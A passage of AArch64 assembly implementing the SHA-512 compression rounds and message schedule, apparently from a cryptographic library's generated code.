stp x27,x28,[sp,#80]
sub sp,sp,#4*8
ldp x20,x21,[x0] // load context
ldp x22,x23,[x0,#2*8]
ldp x24,x25,[x0,#4*8]
add x2,x1,x2,lsl#7 // end of input
ldp x26,x27,[x0,#6*8]
adrp x30,LK512@PAGE
add x30,x30,LK512@PAGEOFF
stp x0,x2,[x29,#96]
Loop:
ldp x3,x4,[x1],#2*8
ldr x19,[x30],#8 // *K++
eor x28,x21,x22 // magic seed
str x1,[x29,#112]
#ifndef __AARCH64EB__
rev x3,x3 // 0
#endif
ror x16,x24,#14
add x27,x27,x19 // h+=K[i]
eor x6,x24,x24,ror#23
and x17,x25,x24
bic x19,x26,x24
add x27,x27,x3 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x20,x21 // a^b, b^c in next round
eor x16,x16,x6,ror#18 // Sigma1(e)
ror x6,x20,#28
add x27,x27,x17 // h+=Ch(e,f,g)
eor x17,x20,x20,ror#5
add x27,x27,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x23,x23,x27 // d+=h
eor x28,x28,x21 // Maj(a,b,c)
eor x17,x6,x17,ror#34 // Sigma0(a)
add x27,x27,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x27,x27,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x4,x4 // 1
#endif
ldp x5,x6,[x1],#2*8
add x27,x27,x17 // h+=Sigma0(a)
ror x16,x23,#14
add x26,x26,x28 // h+=K[i]
eor x7,x23,x23,ror#23
and x17,x24,x23
bic x28,x25,x23
add x26,x26,x4 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x27,x20 // a^b, b^c in next round
eor x16,x16,x7,ror#18 // Sigma1(e)
ror x7,x27,#28
add x26,x26,x17 // h+=Ch(e,f,g)
eor x17,x27,x27,ror#5
add x26,x26,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x22,x22,x26 // d+=h
eor x19,x19,x20 // Maj(a,b,c)
eor x17,x7,x17,ror#34 // Sigma0(a)
add x26,x26,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x26,x26,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x5,x5 // 2
#endif
add x26,x26,x17 // h+=Sigma0(a)
ror x16,x22,#14
add x25,x25,x19 // h+=K[i]
eor x8,x22,x22,ror#23
and x17,x23,x22
bic x19,x24,x22
add x25,x25,x5 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x26,x27 // a^b, b^c in next round
eor x16,x16,x8,ror#18 // Sigma1(e)
ror x8,x26,#28
add x25,x25,x17 // h+=Ch(e,f,g)
eor x17,x26,x26,ror#5
add x25,x25,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x21,x21,x25 // d+=h
eor x28,x28,x27 // Maj(a,b,c)
eor x17,x8,x17,ror#34 // Sigma0(a)
add x25,x25,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x25,x25,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x6,x6 // 3
#endif
ldp x7,x8,[x1],#2*8
add x25,x25,x17 // h+=Sigma0(a)
ror x16,x21,#14
add x24,x24,x28 // h+=K[i]
eor x9,x21,x21,ror#23
and x17,x22,x21
bic x28,x23,x21
add x24,x24,x6 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x25,x26 // a^b, b^c in next round
eor x16,x16,x9,ror#18 // Sigma1(e)
ror x9,x25,#28
add x24,x24,x17 // h+=Ch(e,f,g)
eor x17,x25,x25,ror#5
add x24,x24,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x20,x20,x24 // d+=h
eor x19,x19,x26 // Maj(a,b,c)
eor x17,x9,x17,ror#34 // Sigma0(a)
add x24,x24,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x24,x24,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x7,x7 // 4
#endif
add x24,x24,x17 // h+=Sigma0(a)
ror x16,x20,#14
add x23,x23,x19 // h+=K[i]
eor x10,x20,x20,ror#23
and x17,x21,x20
bic x19,x22,x20
add x23,x23,x7 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x24,x25 // a^b, b^c in next round
eor x16,x16,x10,ror#18 // Sigma1(e)
ror x10,x24,#28
add x23,x23,x17 // h+=Ch(e,f,g)
eor x17,x24,x24,ror#5
add x23,x23,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x27,x27,x23 // d+=h
eor x28,x28,x25 // Maj(a,b,c)
eor x17,x10,x17,ror#34 // Sigma0(a)
add x23,x23,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x23,x23,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x8,x8 // 5
#endif
ldp x9,x10,[x1],#2*8
add x23,x23,x17 // h+=Sigma0(a)
ror x16,x27,#14
add x22,x22,x28 // h+=K[i]
eor x11,x27,x27,ror#23
and x17,x20,x27
bic x28,x21,x27
add x22,x22,x8 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x23,x24 // a^b, b^c in next round
eor x16,x16,x11,ror#18 // Sigma1(e)
ror x11,x23,#28
add x22,x22,x17 // h+=Ch(e,f,g)
eor x17,x23,x23,ror#5
add x22,x22,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x26,x26,x22 // d+=h
eor x19,x19,x24 // Maj(a,b,c)
eor x17,x11,x17,ror#34 // Sigma0(a)
add x22,x22,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x22,x22,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x9,x9 // 6
#endif
add x22,x22,x17 // h+=Sigma0(a)
ror x16,x26,#14
add x21,x21,x19 // h+=K[i]
eor x12,x26,x26,ror#23
and x17,x27,x26
bic x19,x20,x26
add x21,x21,x9 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x22,x23 // a^b, b^c in next round
eor x16,x16,x12,ror#18 // Sigma1(e)
ror x12,x22,#28
add x21,x21,x17 // h+=Ch(e,f,g)
eor x17,x22,x22,ror#5
add x21,x21,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x25,x25,x21 // d+=h
eor x28,x28,x23 // Maj(a,b,c)
eor x17,x12,x17,ror#34 // Sigma0(a)
add x21,x21,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x21,x21,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x10,x10 // 7
#endif
ldp x11,x12,[x1],#2*8
add x21,x21,x17 // h+=Sigma0(a)
ror x16,x25,#14
add x20,x20,x28 // h+=K[i]
eor x13,x25,x25,ror#23
and x17,x26,x25
bic x28,x27,x25
add x20,x20,x10 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x21,x22 // a^b, b^c in next round
eor x16,x16,x13,ror#18 // Sigma1(e)
ror x13,x21,#28
add x20,x20,x17 // h+=Ch(e,f,g)
eor x17,x21,x21,ror#5
add x20,x20,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x24,x24,x20 // d+=h
eor x19,x19,x22 // Maj(a,b,c)
eor x17,x13,x17,ror#34 // Sigma0(a)
add x20,x20,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x20,x20,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x11,x11 // 8
#endif
add x20,x20,x17 // h+=Sigma0(a)
ror x16,x24,#14
add x27,x27,x19 // h+=K[i]
eor x14,x24,x24,ror#23
and x17,x25,x24
bic x19,x26,x24
add x27,x27,x11 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x20,x21 // a^b, b^c in next round
eor x16,x16,x14,ror#18 // Sigma1(e)
ror x14,x20,#28
add x27,x27,x17 // h+=Ch(e,f,g)
eor x17,x20,x20,ror#5
add x27,x27,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x23,x23,x27 // d+=h
eor x28,x28,x21 // Maj(a,b,c)
eor x17,x14,x17,ror#34 // Sigma0(a)
add x27,x27,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x27,x27,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x12,x12 // 9
#endif
ldp x13,x14,[x1],#2*8
add x27,x27,x17 // h+=Sigma0(a)
ror x16,x23,#14
add x26,x26,x28 // h+=K[i]
eor x15,x23,x23,ror#23
and x17,x24,x23
bic x28,x25,x23
add x26,x26,x12 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x27,x20 // a^b, b^c in next round
eor x16,x16,x15,ror#18 // Sigma1(e)
ror x15,x27,#28
add x26,x26,x17 // h+=Ch(e,f,g)
eor x17,x27,x27,ror#5
add x26,x26,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x22,x22,x26 // d+=h
eor x19,x19,x20 // Maj(a,b,c)
eor x17,x15,x17,ror#34 // Sigma0(a)
add x26,x26,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x26,x26,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x13,x13 // 10
#endif
add x26,x26,x17 // h+=Sigma0(a)
ror x16,x22,#14
add x25,x25,x19 // h+=K[i]
eor x0,x22,x22,ror#23
and x17,x23,x22
bic x19,x24,x22
add x25,x25,x13 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x26,x27 // a^b, b^c in next round
eor x16,x16,x0,ror#18 // Sigma1(e)
ror x0,x26,#28
add x25,x25,x17 // h+=Ch(e,f,g)
eor x17,x26,x26,ror#5
add x25,x25,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x21,x21,x25 // d+=h
eor x28,x28,x27 // Maj(a,b,c)
eor x17,x0,x17,ror#34 // Sigma0(a)
add x25,x25,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x25,x25,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x14,x14 // 11
#endif
ldp x15,x0,[x1],#2*8
add x25,x25,x17 // h+=Sigma0(a)
str x6,[sp,#24]
ror x16,x21,#14
add x24,x24,x28 // h+=K[i]
eor x6,x21,x21,ror#23
and x17,x22,x21
bic x28,x23,x21
add x24,x24,x14 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x25,x26 // a^b, b^c in next round
eor x16,x16,x6,ror#18 // Sigma1(e)
ror x6,x25,#28
add x24,x24,x17 // h+=Ch(e,f,g)
eor x17,x25,x25,ror#5
add x24,x24,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x20,x20,x24 // d+=h
eor x19,x19,x26 // Maj(a,b,c)
eor x17,x6,x17,ror#34 // Sigma0(a)
add x24,x24,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x24,x24,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x15,x15 // 12
#endif
add x24,x24,x17 // h+=Sigma0(a)
str x7,[sp,#0]
ror x16,x20,#14
add x23,x23,x19 // h+=K[i]
eor x7,x20,x20,ror#23
and x17,x21,x20
bic x19,x22,x20
add x23,x23,x15 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x24,x25 // a^b, b^c in next round
eor x16,x16,x7,ror#18 // Sigma1(e)
ror x7,x24,#28
add x23,x23,x17 // h+=Ch(e,f,g)
eor x17,x24,x24,ror#5
add x23,x23,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x27,x27,x23 // d+=h
eor x28,x28,x25 // Maj(a,b,c)
eor x17,x7,x17,ror#34 // Sigma0(a)
add x23,x23,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x23,x23,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x0,x0 // 13
#endif
ldp x1,x2,[x1]
add x23,x23,x17 // h+=Sigma0(a)
str x8,[sp,#8]
ror x16,x27,#14
add x22,x22,x28 // h+=K[i]
eor x8,x27,x27,ror#23
and x17,x20,x27
bic x28,x21,x27
add x22,x22,x0 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x23,x24 // a^b, b^c in next round
eor x16,x16,x8,ror#18 // Sigma1(e)
ror x8,x23,#28
add x22,x22,x17 // h+=Ch(e,f,g)
eor x17,x23,x23,ror#5
add x22,x22,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x26,x26,x22 // d+=h
eor x19,x19,x24 // Maj(a,b,c)
eor x17,x8,x17,ror#34 // Sigma0(a)
add x22,x22,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x22,x22,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x1,x1 // 14
#endif
ldr x6,[sp,#24]
add x22,x22,x17 // h+=Sigma0(a)
str x9,[sp,#16]
ror x16,x26,#14
add x21,x21,x19 // h+=K[i]
eor x9,x26,x26,ror#23
and x17,x27,x26
bic x19,x20,x26
add x21,x21,x1 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x22,x23 // a^b, b^c in next round
eor x16,x16,x9,ror#18 // Sigma1(e)
ror x9,x22,#28
add x21,x21,x17 // h+=Ch(e,f,g)
eor x17,x22,x22,ror#5
add x21,x21,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x25,x25,x21 // d+=h
eor x28,x28,x23 // Maj(a,b,c)
eor x17,x9,x17,ror#34 // Sigma0(a)
add x21,x21,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x21,x21,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x2,x2 // 15
#endif
ldr x7,[sp,#0]
add x21,x21,x17 // h+=Sigma0(a)
str x10,[sp,#24]
ror x16,x25,#14
add x20,x20,x28 // h+=K[i]
ror x9,x4,#1
and x17,x26,x25
ror x8,x1,#19
bic x28,x27,x25
ror x10,x21,#28
add x20,x20,x2 // h+=X[i]
eor x16,x16,x25,ror#18
eor x9,x9,x4,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x21,x22 // a^b, b^c in next round
eor x16,x16,x25,ror#41 // Sigma1(e)
eor x10,x10,x21,ror#34
add x20,x20,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x8,x8,x1,ror#61
eor x9,x9,x4,lsr#7 // sigma0(X[i+1])
add x20,x20,x16 // h+=Sigma1(e)
eor x19,x19,x22 // Maj(a,b,c)
eor x17,x10,x21,ror#39 // Sigma0(a)
eor x8,x8,x1,lsr#6 // sigma1(X[i+14])
add x3,x3,x12
add x24,x24,x20 // d+=h
add x20,x20,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x3,x3,x9
add x20,x20,x17 // h+=Sigma0(a)
add x3,x3,x8
Loop_16_xx:
ldr x8,[sp,#8]
str x11,[sp,#0]
ror x16,x24,#14
add x27,x27,x19 // h+=K[i]
ror x10,x5,#1
and x17,x25,x24
ror x9,x2,#19
bic x19,x26,x24
ror x11,x20,#28
add x27,x27,x3 // h+=X[i]
eor x16,x16,x24,ror#18
eor x10,x10,x5,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x20,x21 // a^b, b^c in next round
eor x16,x16,x24,ror#41 // Sigma1(e)
eor x11,x11,x20,ror#34
add x27,x27,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x9,x9,x2,ror#61
eor x10,x10,x5,lsr#7 // sigma0(X[i+1])
add x27,x27,x16 // h+=Sigma1(e)
eor x28,x28,x21 // Maj(a,b,c)
eor x17,x11,x20,ror#39 // Sigma0(a)
eor x9,x9,x2,lsr#6 // sigma1(X[i+14])
add x4,x4,x13
add x23,x23,x27 // d+=h
add x27,x27,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x4,x4,x10
add x27,x27,x17 // h+=Sigma0(a)
add x4,x4,x9
ldr x9,[sp,#16]
str x12,[sp,#8]
ror x16,x23,#14
add x26,x26,x28 // h+=K[i]
ror x11,x6,#1
and x17,x24,x23
ror x10,x3,#19
bic x28,x25,x23
ror x12,x27,#28
add x26,x26,x4 // h+=X[i]
eor x16,x16,x23,ror#18
eor x11,x11,x6,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x27,x20 // a^b, b^c in next round
eor x16,x16,x23,ror#41 // Sigma1(e)
eor x12,x12,x27,ror#34
add x26,x26,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x10,x10,x3,ror#61
eor x11,x11,x6,lsr#7 // sigma0(X[i+1])
add x26,x26,x16 // h+=Sigma1(e)
eor x19,x19,x20 // Maj(a,b,c)
eor x17,x12,x27,ror#39 // Sigma0(a)
eor x10,x10,x3,lsr#6 // sigma1(X[i+14])
add x5,x5,x14
add x22,x22,x26 // d+=h
add x26,x26,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x5,x5,x11
add x26,x26,x17 // h+=Sigma0(a)
add x5,x5,x10
ldr x10,[sp,#24]
str x13,[sp,#16]
ror x16,x22,#14
add x25,x25,x19 // h+=K[i]
ror x12,x7,#1
and x17,x23,x22
ror x11,x4,#19
bic x19,x24,x22
ror x13,x26,#28
add x25,x25,x5 // h+=X[i]
eor x16,x16,x22,ror#18
eor x12,x12,x7,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x26,x27 // a^b, b^c in next round
eor x16,x16,x22,ror#41 // Sigma1(e)
eor x13,x13,x26,ror#34
add x25,x25,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x11,x11,x4,ror#61
eor x12,x12,x7,lsr#7 // sigma0(X[i+1])
add x25,x25,x16 // h+=Sigma1(e)
eor x28,x28,x27 // Maj(a,b,c)
eor x17,x13,x26,ror#39 // Sigma0(a)
eor x11,x11,x4,lsr#6 // sigma1(X[i+14])
add x6,x6,x15
add x21,x21,x25 // d+=h
add x25,x25,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x6,x6,x12
add x25,x25,x17 // h+=Sigma0(a)
add x6,x6,x11
ldr x11,[sp,#0]
str x14,[sp,#24]
ror x16,x21,#14
add x24,x24,x28 // h+=K[i]
ror x13,x8,#1
and x17,x22,x21
ror x12,x5,#19
bic x28,x23,x21
ror x14,x25,#28
add x24,x24,x6 // h+=X[i]
eor x16,x16,x21,ror#18
eor x13,x13,x8,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x25,x26 // a^b, b^c in next round
eor x16,x16,x21,ror#41 // Sigma1(e)
eor x14,x14,x25,ror#34
add x24,x24,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x12,x12,x5,ror#61
eor x13,x13,x8,lsr#7 // sigma0(X[i+1])
add x24,x24,x16 // h+=Sigma1(e)
eor x19,x19,x26 // Maj(a,b,c)
eor x17,x14,x25,ror#39 // Sigma0(a)
eor x12,x12,x5,lsr#6 // sigma1(X[i+14])
add x7,x7,x0
add x20,x20,x24 // d+=h
add x24,x24,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x7,x7,x13
add x24,x24,x17 // h+=Sigma0(a)
add x7,x7,x12
ldr x12,[sp,#8]
str x15,[sp,#0]
ror x16,x20,#14
add x23,x23,x19 // h+=K[i]
ror x14,x9,#1
and x17,x21,x20
ror x13,x6,#19
bic x19,x22,x20
ror x15,x24,#28
add x23,x23,x7 // h+=X[i]
eor x16,x16,x20,ror#18
eor x14,x14,x9,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x24,x25 // a^b, b^c in next round
eor x16,x16,x20,ror#41 // Sigma1(e)
eor x15,x15,x24,ror#34
add x23,x23,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x13,x13,x6,ror#61
eor x14,x14,x9,lsr#7 // sigma0(X[i+1])
add x23,x23,x16 // h+=Sigma1(e)
eor x28,x28,x25 // Maj(a,b,c)
eor x17,x15,x24,ror#39 // Sigma0(a)
eor x13,x13,x6,lsr#6 // sigma1(X[i+14])
add x8,x8,x1
add x27,x27,x23 // d+=h
add x23,x23,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x8,x8,x14
add x23,x23,x17 // h+=Sigma0(a)
add x8,x8,x13
ldr x13,[sp,#16]
str x0,[sp,#8]
ror x16,x27,#14
add x22,x22,x28 // h+=K[i]
ror x15,x10,#1
and x17,x20,x27
ror x14,x7,#19
bic x28,x21,x27
ror x0,x23,#28
add x22,x22,x8 // h+=X[i]
eor x16,x16,x27,ror#18
eor x15,x15,x10,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x23,x24 // a^b, b^c in next round
eor x16,x16,x27,ror#41 // Sigma1(e)
eor x0,x0,x23,ror#34
add x22,x22,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x14,x14,x7,ror#61
eor x15,x15,x10,lsr#7 // sigma0(X[i+1])
add x22,x22,x16 // h+=Sigma1(e)
eor x19,x19,x24 // Maj(a,b,c)
eor x17,x0,x23,ror#39 // Sigma0(a)
eor x14,x14,x7,lsr#6 // sigma1(X[i+14])
add x9,x9,x2
add x26,x26,x22 // d+=h
add x22,x22,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x9,x9,x15
add x22,x22,x17 // h+=Sigma0(a)
add x9,x9,x14
ldr x14,[sp,#24]
str x1,[sp,#16]
ror x16,x26,#14
add x21,x21,x19 // h+=K[i]
ror x0,x11,#1
and x17,x27,x26
ror x15,x8,#19
bic x19,x20,x26
ror x1,x22,#28
add x21,x21,x9 // h+=X[i]
eor x16,x16,x26,ror#18
eor x0,x0,x11,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x22,x23 // a^b, b^c in next round
eor x16,x16,x26,ror#41 // Sigma1(e)
eor x1,x1,x22,ror#34
add x21,x21,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x15,x15,x8,ror#61
eor x0,x0,x11,lsr#7 // sigma0(X[i+1])
add x21,x21,x16 // h+=Sigma1(e)
eor x28,x28,x23 // Maj(a,b,c)
eor x17,x1,x22,ror#39 // Sigma0(a)
eor x15,x15,x8,lsr#6 // sigma1(X[i+14])
add x10,x10,x3
add x25,x25,x21 // d+=h
add x21,x21,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x10,x10,x0
add x21,x21,x17 // h+=Sigma0(a)
add x10,x10,x15
ldr x15,[sp,#0]
str x2,[sp,#24]
ror x16,x25,#14
add x20,x20,x28 // h+=K[i]
ror x1,x12,#1
and x17,x26,x25
ror x0,x9,#19
bic x28,x27,x25
ror x2,x21,#28
add x20,x20,x10 // h+=X[i]
eor x16,x16,x25,ror#18
eor x1,x1,x12,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x21,x22 // a^b, b^c in next round
eor x16,x16,x25,ror#41 // Sigma1(e)
eor x2,x2,x21,ror#34
add x20,x20,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x0,x0,x9,ror#61
eor x1,x1,x12,lsr#7 // sigma0(X[i+1])
add x20,x20,x16 // h+=Sigma1(e)
eor x19,x19,x22 // Maj(a,b,c)
eor x17,x2,x21,ror#39 // Sigma0(a)
eor x0,x0,x9,lsr#6 // sigma1(X[i+14])
add x11,x11,x4
add x24,x24,x20 // d+=h
add x20,x20,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x11,x11,x1
add x20,x20,x17 // h+=Sigma0(a)
add x11,x11,x0
ldr x0,[sp,#8]
str x3,[sp,#0]
ror x16,x24,#14
add x27,x27,x19 // h+=K[i]
ror x2,x13,#1
and x17,x25,x24
ror x1,x10,#19
bic x19,x26,x24
ror x3,x20,#28
add x27,x27,x11 // h+=X[i]
eor x16,x16,x24,ror#18
eor x2,x2,x13,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x20,x21 // a^b, b^c in next round
eor x16,x16,x24,ror#41 // Sigma1(e)
eor x3,x3,x20,ror#34
add x27,x27,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x1,x1,x10,ror#61
eor x2,x2,x13,lsr#7 // sigma0(X[i+1])
add x27,x27,x16 // h+=Sigma1(e)
eor x28,x28,x21 // Maj(a,b,c)
eor x17,x3,x20,ror#39 // Sigma0(a)
eor x1,x1,x10,lsr#6 // sigma1(X[i+14])
add x12,x12,x5
add x23,x23,x27 // d+=h
add x27,x27,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x12,x12,x2
add x27,x27,x17 // h+=Sigma0(a)
add x12,x12,x1
ldr x1,[sp,#16]
str x4,[sp,#8]
ror x16,x23,#14
add x26,x26,x28 // h+=K[i]
ror x3,x14,#1
and x17,x24,x23
ror x2,x11,#19
bic x28,x25,x23
ror x4,x27,#28
add x26,x26,x12 // h+=X[i]
eor x16,x16,x23,ror#18
eor x3,x3,x14,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x27,x20 // a^b, b^c in next round
eor x16,x16,x23,ror#41 // Sigma1(e)
eor x4,x4,x27,ror#34
add x26,x26,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x2,x2,x11,ror#61
eor x3,x3,x14,lsr#7 // sigma0(X[i+1])
add x26,x26,x16 // h+=Sigma1(e)
eor x19,x19,x20 // Maj(a,b,c)
eor x17,x4,x27,ror#39 // Sigma0(a)
eor x2,x2,x11,lsr#6 // sigma1(X[i+14])
add x13,x13,x6
add x22,x22,x26 // d+=h
add x26,x26,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x13,x13,x3
add x26,x26,x17 // h+=Sigma0(a)
add x13,x13,x2
ldr x2,[sp,#24]
str x5,[sp,#16]
ror x16,x22,#14
add x25,x25,x19 // h+=K[i]
ror x4,x15,#1
and x17,x23,x22
ror x3,x12,#19
bic x19,x24,x22
ror x5,x26,#28
add x25,x25,x13 // h+=X[i]
eor x16,x16,x22,ror#18
eor x4,x4,x15,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x26,x27 // a^b, b^c in next round
eor x16,x16,x22,ror#41 // Sigma1(e)
eor x5,x5,x26,ror#34
add x25,x25,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x3,x3,x12,ror#61
eor x4,x4,x15,lsr#7 // sigma0(X[i+1])
add x25,x25,x16 // h+=Sigma1(e)
eor x28,x28,x27 // Maj(a,b,c)
eor x17,x5,x26,ror#39 // Sigma0(a)
eor x3,x3,x12,lsr#6 // sigma1(X[i+14])
add x14,x14,x7
add x21,x21,x25 // d+=h
add x25,x25,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x14,x14,x4
add x25,x25,x17 // h+=Sigma0(a)
add x14,x14,x3
ldr x3,[sp,#0]
str x6,[sp,#24]
ror x16,x21,#14
add x24,x24,x28 // h+=K[i]
ror x5,x0,#1
and x17,x22,x21
ror x4,x13,#19
bic x28,x23,x21
ror x6,x25,#28
add x24,x24,x14 // h+=X[i]
eor x16,x16,x21,ror#18
eor x5,x5,x0,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x25,x26 // a^b, b^c in next round
eor x16,x16,x21,ror#41 // Sigma1(e)
eor x6,x6,x25,ror#34
add x24,x24,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x4,x4,x13,ror#61
eor x5,x5,x0,lsr#7 // sigma0(X[i+1])
add x24,x24,x16 // h+=Sigma1(e)
eor x19,x19,x26 // Maj(a,b,c)
eor x17,x6,x25,ror#39 // Sigma0(a)
eor x4,x4,x13,lsr#6 // sigma1(X[i+14])
add x15,x15,x8
add x20,x20,x24 // d+=h
add x24,x24,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x15,x15,x5
add x24,x24,x17 // h+=Sigma0(a)
add x15,x15,x4
ldr x4,[sp,#8]
str x7,[sp,#0]
ror x16,x20,#14
add x23,x23,x19 // h+=K[i]
ror x6,x1,#1
and x17,x21,x20
ror x5,x14,#19
bic x19,x22,x20
ror x7,x24,#28
add x23,x23,x15 // h+=X[i]
eor x16,x16,x20,ror#18
eor x6,x6,x1,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x24,x25 // a^b, b^c in next round
eor x16,x16,x20,ror#41 // Sigma1(e)
eor x7,x7,x24,ror#34
add x23,x23,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x5,x5,x14,ror#61
eor x6,x6,x1,lsr#7 // sigma0(X[i+1])
add x23,x23,x16 // h+=Sigma1(e)
eor x28,x28,x25 // Maj(a,b,c)
eor x17,x7,x24,ror#39 // Sigma0(a)
